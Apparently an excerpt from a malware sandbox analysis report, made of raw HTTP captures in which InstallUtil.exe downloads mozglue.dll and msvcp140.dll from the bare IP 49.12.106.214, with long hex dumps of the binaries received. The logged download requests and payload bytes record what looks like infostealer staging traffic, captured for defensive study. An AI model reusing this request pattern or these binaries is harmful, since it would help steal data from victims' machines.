                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00
                                                                                                                Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08
                                                                                                                Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01
                                                                                                                Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00
                                                                                                                Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89
                                                                                                                Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45
                                                                                                                Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                                                                2024-10-08 02:59:53 UTC16384INData Raw: c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89
                                                                                                                Data Ascii: ,0<48%8A)$


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.44975449.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:54 UTC197OUTGET /mozglue.dll HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:54 UTC261INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:54 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 608080
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tuesday, 08-Oct-2024 02:59:54 GMT
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-10-08 02:59:54 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                2024-10-08 02:59:54 UTC16384INData Raw: 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7
                                                                                                                Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                2024-10-08 02:59:54 UTC16384INData Raw: 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff
                                                                                                                Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                2024-10-08 02:59:54 UTC16384INData Raw: 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f
                                                                                                                Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                2024-10-08 02:59:54 UTC16384INData Raw: c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06
                                                                                                                Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                2024-10-08 02:59:54 UTC16384INData Raw: fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc
                                                                                                                Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                2024-10-08 02:59:54 UTC16384INData Raw: 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83
                                                                                                                Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                2024-10-08 02:59:54 UTC16384INData Raw: b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24
                                                                                                                Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                                                                2024-10-08 02:59:55 UTC16384INData Raw: e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10
                                                                                                                Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                2024-10-08 02:59:55 UTC16384INData Raw: 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85
                                                                                                                Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.44975649.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:55 UTC198OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:56 UTC261INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:56 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 450024
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tuesday, 08-Oct-2024 02:59:56 GMT
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-10-08 02:59:56 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00
                                                                                                                Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff
                                                                                                                Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
